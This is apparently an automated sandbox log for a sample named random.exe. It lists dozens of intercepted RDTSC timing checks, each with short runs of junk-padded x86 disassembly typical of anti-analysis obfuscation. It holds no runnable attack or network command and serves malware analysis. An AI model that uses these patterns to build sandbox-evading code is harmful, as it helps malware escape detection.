Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115E8C7 second address: 115E8EB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F980CD044EEh 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED5D second address: 115ED65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED65 second address: 115ED77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044DEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED77 second address: 115ED7B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED7B second address: 115ED8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F980CD044D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED8E second address: 115ED9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD224Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 115ED9F second address: 115EDA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1163456 second address: 1163463 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007F980CCD224Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11634EF second address: 11634F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 116366D second address: 1163681 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jg 00007F980CCD2246h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1163681 second address: 116368B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11637EC second address: 11637F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11637F0 second address: 11637F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 11637F5 second address: 1163823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F980CCD224Ah 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp+04h], eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F980CCD2257h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1166DC3 second address: 1166DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F980CD044E2h 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007F980CD044D6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1166DE4 second address: 1166DE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 1166DE8 second address: 1166DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53007EF second address: 53007F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53007F5 second address: 530086F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F980CD044E9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F980CD044DEh 0x00000017 mov ebp, esp 0x00000019 pushad 0x0000001a mov edi, ecx 0x0000001c pushfd 0x0000001d jmp 00007F980CD044DAh 0x00000022 and ax, BE28h 0x00000027 jmp 00007F980CD044DBh 0x0000002c popfd 0x0000002d popad 0x0000002e xchg eax, ecx 0x0000002f jmp 00007F980CD044E6h 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 530086F second address: 5300873 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300873 second address: 5300879 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300879 second address: 530088A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 0Bh 0x00000005 mov cx, 21CDh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ecx 0x0000000d pushad 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 530088A second address: 53008AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F980CD044E9h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53008AF second address: 5300912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F980CCD2251h 0x0000000f xchg eax, esi 0x00000010 jmp 00007F980CCD224Eh 0x00000015 lea eax, dword ptr [ebp-04h] 0x00000018 jmp 00007F980CCD2250h 0x0000001d nop 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F980CCD2257h 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300912 second address: 5300918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300918 second address: 530091C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 530091C second address: 5300934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F980CD044DDh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 5300934 second address: 5300974 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD2251h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jmp 00007F980CCD224Eh 0x0000000f push dword ptr [ebp+08h] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F980CCD2257h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53009AD second address: 53009DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F980CD044E8h 0x0000000a sub esi, 23105918h 0x00000010 jmp 00007F980CD044DBh 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53009DD second address: 53009E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53009E3 second address: 53009E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 53009E7 second address: 5300A2D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [ebp-04h], 00000000h 0x0000000f jmp 00007F980CCD2256h 0x00000014 mov esi, eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F980CCD2257h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0051 second address: 52F010A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F980CD044DEh 0x00000012 sbb ah, FFFFFFE8h 0x00000015 jmp 00007F980CD044DBh 0x0000001a popfd 0x0000001b mov dh, ah 0x0000001d popad 0x0000001e sub esp, 2Ch 0x00000021 pushad 0x00000022 mov dx, 75C4h 0x00000026 pushad 0x00000027 mov ax, bx 0x0000002a jmp 00007F980CD044DFh 0x0000002f popad 0x00000030 popad 0x00000031 xchg eax, ebx 0x00000032 jmp 00007F980CD044E6h 0x00000037 push eax 0x00000038 jmp 00007F980CD044DBh 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f popad 0x00000040 push ecx 0x00000041 pushad 0x00000042 mov dh, cl 0x00000044 pushfd 0x00000045 jmp 00007F980CD044E5h 0x0000004a add eax, 73A73476h 0x00000050 jmp 00007F980CD044E1h 0x00000055 popfd 0x00000056 popad 0x00000057 mov dword ptr [esp], edi 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F010A second address: 52F010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F010E second address: 52F0112 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0112 second address: 52F0118 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F017F second address: 52F01D2 instructions: 0x00000000 rdtsc 0x00000002 mov ax, F907h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 mov esi, ebx 0x0000000b pop edx 0x0000000c popad 0x0000000d sub ebx, ebx 0x0000000f pushad 0x00000010 push edx 0x00000011 mov cl, F6h 0x00000013 pop ebx 0x00000014 pushfd 0x00000015 jmp 00007F980CD044E6h 0x0000001a adc cx, 0318h 0x0000001f jmp 00007F980CD044DBh 0x00000024 popfd 0x00000025 popad 0x00000026 sub edi, edi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F980CD044E2h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F01D2 second address: 52F0213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CCD224Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 inc ebx 0x0000000a jmp 00007F980CCD2256h 0x0000000f test al, al 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F980CCD2257h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F02DE second address: 52F034A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F980CD044E2h 0x00000009 or si, B548h 0x0000000e jmp 00007F980CD044DBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 nop 0x00000018 pushad 0x00000019 mov cl, FDh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F980CD044E3h 0x00000022 or cl, 0000003Eh 0x00000025 jmp 00007F980CD044E9h 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d push eax 0x0000002e pushad 0x0000002f mov di, 7652h 0x00000033 push eax 0x00000034 push edx 0x00000035 push ebx 0x00000036 pop eax 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F034A second address: 52F034E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F034E second address: 52F0372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ecx 0x0000000c pop edi 0x0000000d jmp 00007F980CD044E6h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0372 second address: 52F0378 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F03DA second address: 52F03DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F03DE second address: 52F03E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F03E4 second address: 52F03FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044E6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F03FE second address: 52F0402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0402 second address: 52F049C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F980CD04559h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pushfd 0x00000011 jmp 00007F980CD044E8h 0x00000016 sbb cx, 0848h 0x0000001b jmp 00007F980CD044DBh 0x00000020 popfd 0x00000021 pop esi 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 pop esi 0x00000026 popad 0x00000027 cmp dword ptr [ebp-14h], edi 0x0000002a pushad 0x0000002b mov di, D442h 0x0000002f pushfd 0x00000030 jmp 00007F980CD044E3h 0x00000035 add eax, 0B341B3Eh 0x0000003b jmp 00007F980CD044E9h 0x00000040 popfd 0x00000041 popad 0x00000042 jne 00007F987E1024F2h 0x00000048 jmp 00007F980CD044DEh 0x0000004d mov ebx, dword ptr [ebp+08h] 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 mov bx, ax 0x00000056 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F049C second address: 52F04FA instructions: 0x00000000 rdtsc 0x00000002 mov eax, 769D2E6Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F980CCD2254h 0x0000000f xor si, F298h 0x00000014 jmp 00007F980CCD224Bh 0x00000019 popfd 0x0000001a popad 0x0000001b lea eax, dword ptr [ebp-2Ch] 0x0000001e pushad 0x0000001f jmp 00007F980CCD2254h 0x00000024 popad 0x00000025 push edx 0x00000026 jmp 00007F980CCD224Ch 0x0000002b mov dword ptr [esp], esi 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 mov cl, 5Fh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F04FA second address: 52F0531 instructions: 0x00000000 rdtsc 0x00000002 mov edi, 2F0A406Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F980CD044DBh 0x00000011 adc ecx, 04E1256Eh 0x00000017 jmp 00007F980CD044E9h 0x0000001c popfd 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0531 second address: 52F05B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 jmp 00007F980CCD2258h 0x0000000c pushfd 0x0000000d jmp 00007F980CCD2252h 0x00000012 or esi, 3D205B48h 0x00000018 jmp 00007F980CCD224Bh 0x0000001d popfd 0x0000001e popad 0x0000001f mov dword ptr [esp], eax 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 mov ecx, edx 0x00000027 pushfd 0x00000028 jmp 00007F980CCD2257h 0x0000002d sbb ah, 0000003Eh 0x00000030 jmp 00007F980CCD2259h 0x00000035 popfd 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F05B4 second address: 52F05BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F05BA second address: 52F05BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F05BE second address: 52F05E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jmp 00007F980CD044E4h 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F05E3 second address: 52F05E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0615 second address: 52F061B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F061B second address: 52F061F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F061F second address: 52F062F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F062F second address: 52F0633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0633 second address: 52F0639 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0639 second address: 52F063F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F063F second address: 52F0643 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0643 second address: 52F0647 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0647 second address: 52E0D04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a jmp 00007F980CD044E9h 0x0000000f je 00007F987E1024C1h 0x00000015 xor eax, eax 0x00000017 jmp 00007F980CCDDC0Ah 0x0000001c pop esi 0x0000001d pop edi 0x0000001e pop ebx 0x0000001f leave 0x00000020 retn 0004h 0x00000023 nop 0x00000024 cmp eax, 00000000h 0x00000027 setne cl 0x0000002a xor ebx, ebx 0x0000002c test cl, 00000001h 0x0000002f jne 00007F980CD044D7h 0x00000031 jmp 00007F980CD04694h 0x00000036 call 00007F98111467D3h 0x0000003b mov edi, edi 0x0000003d pushad 0x0000003e mov eax, edi 0x00000040 push ebx 0x00000041 pushfd 0x00000042 jmp 00007F980CD044E8h 0x00000047 or esi, 3AA89E08h 0x0000004d jmp 00007F980CD044DBh 0x00000052 popfd 0x00000053 pop ecx 0x00000054 popad 0x00000055 push esi 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 mov edi, 60B510E4h 0x0000005e mov dx, 5750h 0x00000062 popad 0x00000063 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D04 second address: 52E0D1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CCD2255h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D1D second address: 52E0D21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D21 second address: 52E0D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F980CCD224Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D3F second address: 52E0D43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D43 second address: 52E0D49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D49 second address: 52E0D7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F980CD044E7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0D7C second address: 52E0DA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 637Ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e call 00007F980CCD2259h 0x00000013 pop ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0DA5 second address: 52E0DBD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0DBD second address: 52E0DC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0DC1 second address: 52E0DC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0DC5 second address: 52E0DCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0DCB second address: 52E0E01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b movsx ebx, si 0x0000000e push eax 0x0000000f call 00007F980CD044E7h 0x00000014 pop ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 mov dword ptr [ebp-04h], 55534552h 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0E01 second address: 52E0E05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52E0E05 second address: 52E0E16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F980CD044DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0BF5 second address: 52F0BFB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0BFB second address: 52F0C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044DBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0C0A second address: 52F0C27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 6ED056DCh 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F980CCD224Ch 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0C27 second address: 52F0C2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0C2B second address: 52F0C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 52F0D87 second address: 52F0DA1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F980CD044E6h 0x00000009 rdtsc
